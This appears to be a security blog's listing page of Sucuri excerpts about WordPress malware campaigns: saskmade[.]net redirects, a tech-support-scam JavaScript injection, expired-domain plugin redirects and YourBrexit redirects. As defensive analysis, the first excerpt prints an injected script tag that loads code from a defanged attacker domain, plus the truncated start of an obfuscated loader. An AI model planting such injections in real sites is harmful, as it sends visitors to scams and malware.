Categories
Security

Saskmade[.]net Redirects

Earlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we started detecting new modifications of the scripts injected by this attack.

The general idea of the malware is the same, but the domain name and obfuscation have changed slightly.

For example, in the wp_post table they now inject this script:

<script src='hxxps://saskmade[.]net/head.js?ver=2.0.0' type='text/javascript'>

In the section of HTML and PHP files, and at the top of jQuery-related JavaScript files, they inject this new obfuscated script:

var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,
…skipped…

Continue reading Saskmade[.]net Redirects at Sucuri Blog.

Reverse Javascript Injection Redirects to Support Scam on WordPress

Over the last few weeks, we’ve noticed a JavaScript injection in a number of WordPress databases, and we recently wrote about them in a Sucuri Labs Note.

The campaign attempts to redirect visitors to a bogus Windows support page claiming that their computers are infected with ‘riskware’ and will be disabled unless they call what is an obviously bogus support hotline.

Google and several other web security vendors are currently blacklisting the domain; fortunately, most visitors will receive a warning page like this during the redirection process:

 

Tech Support Phone Scam

It’s worth noting that the phone number displayed on the page is auto-generated based on the URL that is supplied.

Continue reading Reverse Javascript Injection Redirects to Support Scam on WordPress at Sucuri Blog.

Expired Domain Leads to WordPress Plugin Redirects

A malicious redirect is a snippet of code that attackers use to send visitors to another site. It is a very common tactic on compromised websites.

These redirects often take visitors to phishing, malware, or advertising sites with the intention of capturing sensitive user data, distributing malware and backdoors, or generating advertisement impressions.

We’ve written before about how attackers use expired domains to redirect visitors to malware and ads, or how domains used in abandoned plugins are registered by hackers.

Continue reading Expired Domain Leads to WordPress Plugin Redirects at Sucuri Blog.

Website Malware: Unwanted Exit to YourBrexit

Some website hacks aim to make political statements. Defacements are well known for this. Some infections redirect visitors to scam sites that push (usually counterfeit) goods or (often illegal) services. But how would you feel if your site redirected visitors to a political news site?

This time we are talking about an attack that mainly targets UK sites and has redirected over 2 million (mostly UK) visitors to YourBrexit[.]net – a site that publishes politically-charged commentary about Brexit.

Continue reading Website Malware: Unwanted Exit to YourBrexit at Sucuri Blog.